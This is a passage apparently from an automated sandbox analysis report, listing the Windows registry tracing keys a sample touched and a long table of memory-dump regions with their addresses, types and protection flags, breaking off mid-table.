HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Realtek HD Audio Universal Service_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Realtek HD Audio Universal Service_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Realtek HD Audio Universal Service_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Realtek HD Audio Universal Service_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Realtek HD Audio Universal Service_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Realtek HD Audio Universal Service_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Realtek HD Audio Universal Service_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Realtek HD Audio Universal Service_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Realtek HD Audio Universal Service_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Realtek HD Audio Universal Service_RASMANCS
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Windows Shell Experience Host_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Windows Shell Experience Host_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Windows Shell Experience Host_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Windows Shell Experience Host_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Windows Shell Experience Host_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Windows Shell Experience Host_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Windows Shell Experience Host_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Windows Shell Experience Host_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Windows Shell Experience Host_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Windows Shell Experience Host_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Windows Shell Experience Host_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Windows Shell Experience Host_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Windows Shell Experience Host_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\Windows Shell Experience Host_RASMANCS
|
FileDirectory
|
||
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
|
SlowContextMenuEntries
|
There are 19 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
CA2000
|
unkown
|
page readonly
|
||
1DB14D2F000
|
unkown
|
page readonly
|
||
B2000
|
unkown
|
page readonly
|
||
14BF2430000
|
heap
|
page read and write
|
||
7FF849030000
|
trusted library allocation
|
page read and write
|
||
2428FB10000
|
heap
|
page read and write
|
||
17AC87B000
|
stack
|
page read and write
|
||
7DF4EE520000
|
trusted library allocation
|
page execute and read and write
|
||
7FF849080000
|
trusted library allocation
|
page read and write
|
||
2849AE80000
|
heap
|
page read and write
|
||
7FF849144000
|
trusted library allocation
|
page read and write
|
||
7FF849260000
|
trusted library allocation
|
page read and write
|
||
1657408A000
|
heap
|
page read and write
|
||
242A9E39000
|
heap
|
page read and write
|
||
27B58150000
|
trusted library allocation
|
page read and write
|
||
2428FD16000
|
heap
|
page read and write
|
||
19C3A905000
|
heap
|
page read and write
|
||
7FF848DE0000
|
trusted library allocation
|
page read and write
|
||
14BDAD90000
|
trusted library allocation
|
page read and write
|
||
7FF849220000
|
trusted library allocation
|
page read and write
|
||
7FF848FA1000
|
trusted library allocation
|
page read and write
|
||
2849E096000
|
trusted library allocation
|
page read and write
|
||
14BDACA4000
|
trusted library allocation
|
page read and write
|
||
242915F0000
|
trusted library allocation
|
page read and write
|
||
19C3A900000
|
heap
|
page read and write
|
||
287D6C60000
|
heap
|
page read and write
|
||
7FF849020000
|
trusted library allocation
|
page read and write
|
||
7FF849260000
|
trusted library allocation
|
page read and write
|
||
7FF849240000
|
trusted library allocation
|
page read and write
|
||
2130000
|
heap
|
page read and write
|
||
27B499D8000
|
trusted library allocation
|
page read and write
|
||
7FF848F10000
|
trusted library allocation
|
page execute and read and write
|
||
287BC9F8000
|
heap
|
page read and write
|
||
7FF849216000
|
trusted library allocation
|
page read and write
|
||
14BDABD0000
|
trusted library allocation
|
page read and write
|
||
1650186D000
|
trusted library allocation
|
page read and write
|
||
7FF848FE0000
|
trusted library allocation
|
page execute and read and write
|
||
8BE9FFB000
|
stack
|
page read and write
|
||
27B47FF0000
|
trusted library allocation
|
page read and write
|
||
3302C7B000
|
stack
|
page read and write
|
||
7FF849000000
|
trusted library allocation
|
page read and write
|
||
14BF218A000
|
heap
|
page read and write
|
||
19C5300C000
|
heap
|
page read and write
|
||
287D6D08000
|
heap
|
page read and write
|
||
287D69E0000
|
heap
|
page read and write
|
||
19C4AE70000
|
trusted library allocation
|
page read and write
|
||
7FF849100000
|
trusted library allocation
|
page read and write
|
||
19C39120000
|
heap
|
page read and write
|
||
7FF849210000
|
trusted library allocation
|
page read and write
|
||
7FF848EC6000
|
trusted library allocation
|
page execute and read and write
|
||
F79790C000
|
stack
|
page read and write
|
||
287D6834000
|
heap
|
page read and write
|
||
17AC577000
|
stack
|
page read and write
|
||
19C4AE61000
|
trusted library allocation
|
page read and write
|
||
7FF849040000
|
trusted library allocation
|
page read and write
|
||
19C52FD6000
|
heap
|
page read and write
|
||
27B48020000
|
trusted library allocation
|
page read and write
|
||
24292570000
|
trusted library allocation
|
page read and write
|
||
7FF848DFD000
|
trusted library allocation
|
page execute and read and write
|
||
165737C9000
|
heap
|
page read and write
|
||
287BCA55000
|
heap
|
page read and write
|
||
14BDBA98000
|
trusted library allocation
|
page read and write
|
||
23BBE77000
|
stack
|
page read and write
|
||
287BF09F000
|
trusted library allocation
|
page read and write
|
||
8BEA2BB000
|
stack
|
page read and write
|
||
19C3BADE000
|
trusted library allocation
|
page read and write
|
||
14BF2466000
|
heap
|
page read and write
|
||
14BE9F70000
|
trusted library allocation
|
page read and write
|
||
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
242A9CB0000
|
heap
|
page execute and read and write
|
||
14BDAFA8000
|
trusted library allocation
|
page read and write
|
||
F796E3E000
|
stack
|
page read and write
|
||
27B49112000
|
trusted library allocation
|
page read and write
|
||
287D69F8000
|
heap
|
page read and write
|
||
7FF84915C000
|
trusted library allocation
|
page read and write
|
||
2849DA35000
|
trusted library allocation
|
page read and write
|
||
1657418B000
|
heap
|
page read and write
|
||
7FF849179000
|
trusted library allocation
|
page read and write
|
||
7FF848FAA000
|
trusted library allocation
|
page read and write
|
||
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
7FF848DF4000
|
trusted library allocation
|
page read and write
|
||
7FF848F10000
|
trusted library allocation
|
page execute and read and write
|
||
2849AD90000
|
trusted library allocation
|
page read and write
|
||
23BBEF8000
|
stack
|
page read and write
|
||
7FF848FB0000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848EA6000
|
trusted library allocation
|
page read and write
|
||
7FF84903D000
|
trusted library allocation
|
page read and write
|
||
7FF848E40000
|
trusted library allocation
|
page read and write
|
||
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
24291801000
|
trusted library allocation
|
page read and write
|
||
2849AC9B000
|
heap
|
page read and write
|
||
16573740000
|
heap
|
page execute and read and write
|
||
19C4AF8B000
|
trusted library allocation
|
page read and write
|
||
7FF849260000
|
trusted library allocation
|
page read and write
|
||
7FF849039000
|
trusted library allocation
|
page read and write
|
||
287D6874000
|
heap
|
page read and write
|
||
7FF8491ED000
|
trusted library allocation
|
page read and write
|
||
14BD81DD000
|
heap
|
page read and write
|
||
7FF8491EC000
|
trusted library allocation
|
page read and write
|
||
8BEA13F000
|
stack
|
page read and write
|
||
7FF849180000
|
trusted library allocation
|
page read and write
|
||
2849DAEB000
|
trusted library allocation
|
page read and write
|
||
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
287BF748000
|
trusted library allocation
|
page read and write
|
||
16573CC6000
|
heap
|
page read and write
|
||
3302A7F000
|
stack
|
page read and write
|
||
F79798E000
|
stack
|
page read and write
|
||
7FF848E3C000
|
trusted library allocation
|
page execute and read and write
|
||
2849E270000
|
trusted library allocation
|
page read and write
|
||
165740F6000
|
heap
|
page read and write
|
||
287BF7AB000
|
trusted library allocation
|
page read and write
|
||
1657404C000
|
heap
|
page read and write
|
||
7FF849169000
|
trusted library allocation
|
page read and write
|
||
19C4ABE8000
|
trusted library allocation
|
page read and write
|
||
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
33027FD000
|
stack
|
page read and write
|
||
16571C28000
|
heap
|
page read and write
|
||
1DB14FFF000
|
unkown
|
page readonly
|
||
7FF849220000
|
trusted library allocation
|
page read and write
|
||
14BDB500000
|
trusted library allocation
|
page read and write
|
||
16501125000
|
trusted library allocation
|
page read and write
|
||
17AC47D000
|
stack
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
16573C3C000
|
heap
|
page read and write
|
||
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
7FF848E4C000
|
trusted library allocation
|
page execute and read and write
|
||
F797B0C000
|
stack
|
page read and write
|
||
19C3AD98000
|
trusted library allocation
|
page read and write
|
||
8BEA23E000
|
stack
|
page read and write
|
||
287BCB75000
|
heap
|
page read and write
|
||
14BD8188000
|
heap
|
page read and write
|
||
2849E17C000
|
trusted library allocation
|
page read and write
|
||
27B60840000
|
trusted library allocation
|
page read and write
|
||
19C4AEB5000
|
trusted library allocation
|
page read and write
|
||
27B606C7000
|
heap
|
page read and write
|
||
27B583CE000
|
trusted library allocation
|
page read and write
|
||
7FF849250000
|
trusted library allocation
|
page read and write
|
||
287D6B00000
|
trusted library allocation
|
page read and write
|
||
16571DC0000
|
heap
|
page read and write
|
||
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
7FF848EA6000
|
trusted library allocation
|
page read and write
|
||
14BDB5C1000
|
trusted library allocation
|
page read and write
|
||
14BDABD9000
|
trusted library allocation
|
page read and write
|
||
19C3C4C3000
|
trusted library allocation
|
page read and write
|
||
7FF8491E3000
|
trusted library allocation
|
page read and write
|
||
8FF000
|
stack
|
page read and write
|
||
19C3C402000
|
trusted library allocation
|
page read and write
|
||
7FF849152000
|
trusted library allocation
|
page read and write
|
||
27B60740000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
19C38F00000
|
heap
|
page read and write
|
||
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
2849DB24000
|
trusted library allocation
|
page read and write
|
||
2240000
|
heap
|
page read and write
|
||
287D6DD4000
|
heap
|
page read and write
|
||
7FF8491E0000
|
trusted library allocation
|
page read and write
|
||
7FF849200000
|
trusted library allocation
|
page read and write
|
||
287BC9B6000
|
heap
|
page read and write
|
||
242A9F65000
|
heap
|
page read and write
|
||
27B609CC000
|
heap
|
page read and write
|
||
2849DBB8000
|
trusted library allocation
|
page read and write
|
||
7FF849140000
|
trusted library allocation
|
page read and write
|
||
7FF848E1D000
|
trusted library allocation
|
page execute and read and write
|
||
27B609B4000
|
heap
|
page read and write
|
||
27B467E0000
|
trusted library allocation
|
page read and write
|
||
242A1873000
|
trusted library allocation
|
page read and write
|
||
3302B7C000
|
stack
|
page read and write
|
||
7FF849080000
|
trusted library allocation
|
page read and write
|
||
2428FCEC000
|
heap
|
page read and write
|
||
7DF442690000
|
trusted library allocation
|
page execute and read and write
|
||
287BF4D2000
|
trusted library allocation
|
page read and write
|
||
242A9F94000
|
heap
|
page read and write
|
||
27B46748000
|
heap
|
page read and write
|
||
7FF848DE3000
|
trusted library allocation
|
page execute and read and write
|
||
14BD9B20000
|
heap
|
page read and write
|
||
27B492BA000
|
trusted library allocation
|
page read and write
|
||
2849CB39000
|
trusted library allocation
|
page read and write
|
||
16510021000
|
trusted library allocation
|
page read and write
|
||
27B58454000
|
trusted library allocation
|
page read and write
|
||
24292BB7000
|
trusted library allocation
|
page read and write
|
||
8BEA1B7000
|
stack
|
page read and write
|
||
16571C64000
|
heap
|
page read and write
|
||
19C3BD47000
|
trusted library allocation
|
page read and write
|
||
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
7FF849180000
|
trusted library allocation
|
page read and write
|
||
165011DB000
|
trusted library allocation
|
page read and write
|
||
19C3C975000
|
trusted library allocation
|
page read and write
|
||
14BD8140000
|
heap
|
page read and write
|
||
7FF84903F000
|
trusted library allocation
|
page read and write
|
||
27B609D4000
|
heap
|
page read and write
|
||
434000
|
unkown
|
page read and write
|
||
33024FE000
|
stack
|
page read and write
|
||
16571E65000
|
heap
|
page read and write
|
||
2849D87D000
|
trusted library allocation
|
page read and write
|
||
27B46668000
|
heap
|
page read and write
|
||
24292253000
|
trusted library allocation
|
page read and write
|
||
7FF849210000
|
trusted library allocation
|
page read and write
|
||
23BC0FC000
|
stack
|
page read and write
|
||
19C3BAE2000
|
trusted library allocation
|
page read and write
|
||
23BC07E000
|
stack
|
page read and write
|
||
7FF849002000
|
trusted library allocation
|
page read and write
|
||
7FF849010000
|
trusted library allocation
|
page read and write
|
||
7FF849182000
|
trusted library allocation
|
page read and write
|
||
7FF848FAA000
|
trusted library allocation
|
page read and write
|
||
23BBAFF000
|
stack
|
page read and write
|
||
16571D70000
|
heap
|
page read and write
|
||
287D6A07000
|
heap
|
page read and write
|
||
14BF2110000
|
heap
|
page read and write
|
||
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
7FF849270000
|
trusted library allocation
|
page read and write
|
||
7FF849010000
|
trusted library allocation
|
page read and write
|
||
287BE6C8000
|
trusted library allocation
|
page read and write
|
||
7FF849123000
|
trusted library allocation
|
page read and write
|
||
19C53339000
|
heap
|
page read and write
|
||
16571D40000
|
heap
|
page read and write
|
||
19C3BC02000
|
trusted library allocation
|
page read and write
|
||
287D6D87000
|
heap
|
page read and write
|
||
7FF848E12000
|
trusted library allocation
|
page read and write
|
||
7FF849000000
|
trusted library allocation
|
page read and write
|
||
14BDB02F000
|
trusted library allocation
|
page read and write
|
||
7FF849090000
|
trusted library allocation
|
page read and write
|
||
19C3BAD1000
|
trusted library allocation
|
page read and write
|
||
287BCAB0000
|
heap
|
page readonly
|
||
2360000
|
heap
|
page read and write
|
||
165102F8000
|
trusted library allocation
|
page read and write
|
||
2849E264000
|
trusted library allocation
|
page read and write
|
||
27AF000
|
stack
|
page read and write
|
||
437000
|
unkown
|
page readonly
|
||
14BF2520000
|
heap
|
page read and write
|
||
19C39130000
|
heap
|
page read and write
|
||
14BD8160000
|
heap
|
page read and write
|
||
14BDA13D000
|
trusted library allocation
|
page read and write
|
||
14BDAE47000
|
trusted library allocation
|
page read and write
|
||
19C3AB71000
|
trusted library allocation
|
page read and write
|
||
284AC911000
|
trusted library allocation
|
page read and write
|
||
A68197A000
|
stack
|
page read and write
|
||
8BEA07E000
|
stack
|
page read and write
|
||
7FF848DED000
|
trusted library allocation
|
page execute and read and write
|
||
16571C7C000
|
heap
|
page read and write
|
||
14BE9CA1000
|
trusted library allocation
|
page read and write
|
||
6CEA579000
|
stack
|
page read and write
|
||
2849E73A000
|
trusted library allocation
|
page read and write
|
||
7FF849247000
|
trusted library allocation
|
page read and write
|
||
7FF84915C000
|
trusted library allocation
|
page read and write
|
||
27B490E6000
|
trusted library allocation
|
page read and write
|
||
7FF849178000
|
trusted library allocation
|
page read and write
|
||
5E5000
|
heap
|
page read and write
|
||
17AD34B000
|
stack
|
page read and write
|
||
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
24291570000
|
heap
|
page readonly
|
||
412000
|
unkown
|
page read and write
|
||
287C02A7000
|
trusted library allocation
|
page read and write
|
||
23BBD7E000
|
stack
|
page read and write
|
||
14BDA9E5000
|
trusted library allocation
|
page read and write
|
||
27B609BF000
|
heap
|
page read and write
|
||
242A9B6A000
|
heap
|
page read and write
|
||
7FF849020000
|
trusted library allocation
|
page read and write
|
||
242915B0000
|
trusted library allocation
|
page read and write
|
||
24291A28000
|
trusted library allocation
|
page read and write
|
||
14BF2491000
|
heap
|
page read and write
|
||
6CEA97F000
|
stack
|
page read and write
|
||
14BF2564000
|
heap
|
page read and write
|
||
7FF84917C000
|
trusted library allocation
|
page read and write
|
||
14BD9B60000
|
trusted library allocation
|
page read and write
|
||
287D6D68000
|
heap
|
page read and write
|
||
287BC9CC000
|
heap
|
page read and write
|
||
16500D72000
|
trusted library allocation
|
page read and write
|
||
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
242A9B5F000
|
heap
|
page read and write
|
||
19C4AF1F000
|
trusted library allocation
|
page read and write
|
||
14BE9F80000
|
trusted library allocation
|
page read and write
|
||
27B48E4E000
|
trusted library allocation
|
page read and write
|
||
7FF849110000
|
trusted library allocation
|
page read and write
|
||
7FF849174000
|
trusted library allocation
|
page read and write
|
||
242A9D07000
|
heap
|
page execute and read and write
|
||
27B48CD9000
|
trusted library allocation
|
page read and write
|
||
27B49204000
|
trusted library allocation
|
page read and write
|
||
19C52FB5000
|
heap
|
page read and write
|
||
7FF848EAC000
|
trusted library allocation
|
page execute and read and write
|
||
242A9F6A000
|
heap
|
page read and write
|
||
19C3C3DB000
|
trusted library allocation
|
page read and write
|
||
16574187000
|
heap
|
page read and write
|
||
7FF8491B0000
|
trusted library allocation
|
page read and write
|
||
7FF848DF3000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848F30000
|
trusted library allocation
|
page execute and read and write
|
||
19C38F64000
|
heap
|
page read and write
|
||
7FF849240000
|
trusted library allocation
|
page execute and read and write
|
||
14BF2530000
|
heap
|
page read and write
|
||
7FF848FD1000
|
trusted library allocation
|
page read and write
|
||
7FF849172000
|
trusted library allocation
|
page read and write
|
||
7FF84927F000
|
trusted library allocation
|
page read and write
|
||
242A1B40000
|
trusted library allocation
|
page read and write
|
||
7FF848FCA000
|
trusted library allocation
|
page read and write
|
||
14BD9BB0000
|
trusted library allocation
|
page read and write
|
||
19C3B8F5000
|
trusted library allocation
|
page read and write
|
||
A681533000
|
stack
|
page read and write
|
||
2849D886000
|
trusted library allocation
|
page read and write
|
||
7FF849188000
|
trusted library allocation
|
page read and write
|
||
19C3BBA0000
|
trusted library allocation
|
page read and write
|
||
23BB7DE000
|
stack
|
page read and write
|
||
24292893000
|
trusted library allocation
|
page read and write
|
||
242A9D00000
|
heap
|
page execute and read and write
|
||
287BCB50000
|
heap
|
page execute and read and write
|
||
24291600000
|
heap
|
page read and write
|
||
287D689C000
|
heap
|
page read and write
|
||
27B60644000
|
heap
|
page read and write
|
||
287BE490000
|
heap
|
page read and write
|
||
27B48309000
|
trusted library allocation
|
page read and write
|
||
19C3C2F6000
|
trusted library allocation
|
page read and write
|
||
14BDAF75000
|
trusted library allocation
|
page read and write
|
||
7FF849150000
|
trusted library allocation
|
page read and write
|
||
27B494A3000
|
trusted library allocation
|
page read and write
|
||
1657409B000
|
heap
|
page read and write
|
||
27B48CE1000
|
trusted library allocation
|
page read and write
|
||
7FF849110000
|
trusted library allocation
|
page read and write
|
||
19C53200000
|
trusted library allocation
|
page read and write
|
||
A681E7E000
|
stack
|
page read and write
|
||
19C52F78000
|
heap
|
page read and write
|
||
27B60620000
|
heap
|
page read and write
|
||
7FF8490D5000
|
trusted library allocation
|
page read and write
|
||
20FE000
|
stack
|
page read and write
|
||
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
7FF849256000
|
trusted library allocation
|
page read and write
|
||
27B480D0000
|
heap
|
page read and write
|
||
7FF848FD8000
|
trusted library allocation
|
page read and write
|
||
6CEA678000
|
stack
|
page read and write
|
||
16574138000
|
heap
|
page read and write
|
||
287CE796000
|
trusted library allocation
|
page read and write
|
||
7FF849020000
|
trusted library allocation
|
page read and write
|
||
19C53310000
|
heap
|
page read and write
|
||
3302473000
|
stack
|
page read and write
|
||
14BD9BA0000
|
heap
|
page readonly
|
||
7FF849030000
|
trusted library allocation
|
page read and write
|
||
27B46540000
|
heap
|
page read and write
|
||
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
7FF84926D000
|
trusted library allocation
|
page read and write
|
||
7FF849152000
|
trusted library allocation
|
page read and write
|
||
19C39125000
|
heap
|
page read and write
|
||
2849E1A2000
|
trusted library allocation
|
page read and write
|
||
24291580000
|
trusted library allocation
|
page read and write
|
||
23BCBCF000
|
stack
|
page read and write
|
||
14BD81CB000
|
heap
|
page read and write
|
||
16501214000
|
trusted library allocation
|
page read and write
|
||
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
24291560000
|
trusted library allocation
|
page read and write
|
||
17AD4CE000
|
stack
|
page read and write
|
||
242928BF000
|
trusted library allocation
|
page read and write
|
||
7FF848FA1000
|
trusted library allocation
|
page read and write
|
||
19C3C950000
|
trusted library allocation
|
page read and write
|
||
23BCDCE000
|
stack
|
page read and write
|
||
2849D881000
|
trusted library allocation
|
page read and write
|
||
23BBDF9000
|
stack
|
page read and write
|
||
16510078000
|
trusted library allocation
|
page read and write
|
||
14BF2277000
|
heap
|
page execute and read and write
|
||
7FF849010000
|
trusted library allocation
|
page read and write
|
||
19C5344F000
|
heap
|
page read and write
|
||
242A9F83000
|
heap
|
page read and write
|
||
287D6856000
|
heap
|
page read and write
|
||
2849ACE3000
|
heap
|
page read and write
|
||
7FF848FF2000
|
trusted library allocation
|
page read and write
|
||
14BF21F0000
|
heap
|
page read and write
|
||
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
287D6CA6000
|
heap
|
page read and write
|
||
27B60662000
|
heap
|
page read and write
|
||
242A9D30000
|
heap
|
page read and write
|
||
7FF849000000
|
trusted library allocation
|
page read and write
|
||
24293094000
|
trusted library allocation
|
page read and write
|
||
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
16571CA8000
|
heap
|
page read and write
|
||
7FF849070000
|
trusted library allocation
|
page read and write
|
||
7FF84915C000
|
trusted library allocation
|
page read and write
|
||
7FF848DFD000
|
trusted library allocation
|
page execute and read and write
|
||
14BF21BC000
|
heap
|
page read and write
|
||
2849DC19000
|
trusted library allocation
|
page read and write
|
||
7FF848FDA000
|
trusted library allocation
|
page read and write
|
||
7FF848F00000
|
trusted library allocation
|
page execute and read and write
|
||
27B480E1000
|
trusted library allocation
|
page read and write
|
||
242A1AF9000
|
trusted library allocation
|
page read and write
|
||
7FF849113000
|
trusted library allocation
|
page read and write
|
||
6CEB44D000
|
stack
|
page read and write
|
||
2849AC30000
|
heap
|
page read and write
|
||
27B46840000
|
heap
|
page read and write
|
||
2849C804000
|
heap
|
page read and write
|
||
19C38FA6000
|
heap
|
page read and write
|
||
7FF849050000
|
trusted library allocation
|
page read and write
|
||
7FF849134000
|
trusted library allocation
|
page read and write
|
||
27B46780000
|
heap
|
page read and write
|
||
2849D88A000
|
trusted library allocation
|
page read and write
|
||
16501E26000
|
trusted library allocation
|
page read and write
|
||
7FF849142000
|
trusted library allocation
|
page read and write
|
||
7FF8490F2000
|
trusted library allocation
|
page read and write
|
||
287D67F0000
|
heap
|
page read and write
|
||
A681B79000
|
stack
|
page read and write
|
||
16510310000
|
trusted library allocation
|
page read and write
|
||
19C3BB56000
|
trusted library allocation
|
page read and write
|
||
7FF849210000
|
trusted library allocation
|
page execute and read and write
|
||
287D6AC0000
|
heap
|
page execute and read and write
|
||
19C4AE5C000
|
trusted library allocation
|
page read and write
|
||
7FF848E23000
|
trusted library allocation
|
page execute and read and write
|
||
7FF849004000
|
trusted library allocation
|
page read and write
|
||
19C38FA9000
|
heap
|
page read and write
|
||
27B48EA0000
|
trusted library allocation
|
page read and write
|
||
409000
|
unkown
|
page read and write
|
||
16571DB0000
|
trusted library allocation
|
page read and write
|
||
165102F6000
|
trusted library allocation
|
page read and write
|
||
242A9F79000
|
heap
|
page read and write
|
||
2849D9A6000
|
trusted library allocation
|
page read and write
|
||
2849DCD5000
|
trusted library allocation
|
page read and write
|
||
242A1821000
|
trusted library allocation
|
page read and write
|
||
19C3B03D000
|
trusted library allocation
|
page read and write
|
||
19C4AB71000
|
trusted library allocation
|
page read and write
|
||
7FF849164000
|
trusted library allocation
|
page read and write
|
||
7FF849200000
|
trusted library allocation
|
page read and write
|
||
6CEB3CF000
|
stack
|
page read and write
|
||
242A9C18000
|
heap
|
page read and write
|
||
16500FA1000
|
trusted library allocation
|
page read and write
|
||
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
7FF848FB0000
|
trusted library allocation
|
page execute and read and write
|
||
7FF849270000
|
trusted library allocation
|
page read and write
|
||
7DF471400000
|
trusted library allocation
|
page execute and read and write
|
||
A681EFB000
|
stack
|
page read and write
|
||
7FF849290000
|
trusted library allocation
|
page read and write
|
||
7FF849000000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848FD2000
|
trusted library allocation
|
page read and write
|
||
33026FF000
|
stack
|
page read and write
|
||
7FF8491EA000
|
trusted library allocation
|
page read and write
|
||
7FF8490DF000
|
trusted library allocation
|
page read and write
|
||
A6818FF000
|
stack
|
page read and write
|
||
F797A8E000
|
stack
|
page read and write
|
||
19C3BBA6000
|
trusted library allocation
|
page read and write
|
||
242925F5000
|
trusted library allocation
|
page read and write
|
||
27B49975000
|
trusted library allocation
|
page read and write
|
||
23BBCF9000
|
stack
|
page read and write
|
||
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
19C53414000
|
heap
|
page read and write
|
||
A681A77000
|
stack
|
page read and write
|
||
7FF848EF6000
|
trusted library allocation
|
page execute and read and write
|
||
242927A3000
|
trusted library allocation
|
page read and write
|
||
287BE526000
|
trusted library allocation
|
page read and write
|
||
2849D940000
|
trusted library allocation
|
page read and write
|
||
7FF849050000
|
trusted library allocation
|
page read and write
|
||
7FF848ED0000
|
trusted library allocation
|
page read and write
|
||
7FF848EDC000
|
trusted library allocation
|
page execute and read and write
|
||
8BE9F7E000
|
stack
|
page read and write
|
||
287BC9F3000
|
heap
|
page read and write
|
||
165737B0000
|
heap
|
page read and write
|
||
A68187F000
|
stack
|
page read and write
|
||
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
27B60660000
|
heap
|
page read and write
|
||
287BFD0D000
|
trusted library allocation
|
page read and write
|
||
14BF246D000
|
heap
|
page read and write
|
||
F7965FF000
|
stack
|
page read and write
|
||
2849AE85000
|
heap
|
page read and write
|
||
24292B3E000
|
trusted library allocation
|
page read and write
|
||
14BD9C40000
|
heap
|
page execute and read and write
|
||
16573C8E000
|
heap
|
page read and write
|
||
242A1AF1000
|
trusted library allocation
|
page read and write
|
||
19C4AFF8000
|
trusted library allocation
|
page read and write
|
||
16571E00000
|
trusted library allocation
|
page read and write
|
||
19C52F40000
|
heap
|
page read and write
|
||
7FF849252000
|
trusted library allocation
|
page read and write
|
||
165740DE000
|
heap
|
page read and write
|
||
7FF84915A000
|
trusted library allocation
|
page read and write
|
||
16571CA3000
|
heap
|
page read and write
|
||
242935E2000
|
trusted library allocation
|
page read and write
|
||
7FF849266000
|
trusted library allocation
|
page read and write
|
||
7FF8491E0000
|
trusted library allocation
|
page read and write
|
||
7FF84914C000
|
trusted library allocation
|
page read and write
|
||
298F000
|
stack
|
page read and write
|
||
6CEA6F6000
|
stack
|
page read and write
|
||
27B49A37000
|
trusted library allocation
|
page read and write
|
||
7FF849230000
|
trusted library allocation
|
page read and write
|
||
F7968F9000
|
stack
|
page read and write
|
||
7FF848FD4000
|
trusted library allocation
|
page read and write
|
||
14BD8165000
|
heap
|
page read and write
|
||
23BBF79000
|
stack
|
page read and write
|
||
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
42C000
|
unkown
|
page read and write
|
||
14BDAD2E000
|
trusted library allocation
|
page read and write
|
||
14BE9C71000
|
trusted library allocation
|
page read and write
|
||
2849ADA0000
|
heap
|
page readonly
|
||
287BCA80000
|
trusted library allocation
|
page read and write
|
||
14BDB563000
|
trusted library allocation
|
page read and write
|
||
6CEA4FE000
|
stack
|
page read and write
|
||
19C533FE000
|
heap
|
page read and write
|
||
16510300000
|
trusted library allocation
|
page read and write
|
||
7FF849030000
|
trusted library allocation
|
page read and write
|
||
7FF849240000
|
trusted library allocation
|
page read and write
|
||
7FF849060000
|
trusted library allocation
|
page read and write
|
||
420000
|
unkown
|
page read and write
|
||
2428FF20000
|
heap
|
page read and write
|
||
5BE000
|
stack
|
page read and write
|
||
7FF848FD2000
|
trusted library allocation
|
page read and write
|
||
F796DBF000
|
stack
|
page read and write
|
||
287BF563000
|
trusted library allocation
|
page read and write
|
||
287BF0A7000
|
trusted library allocation
|
page read and write
|
||
2849E234000
|
trusted library allocation
|
page read and write
|
||
19C4AE66000
|
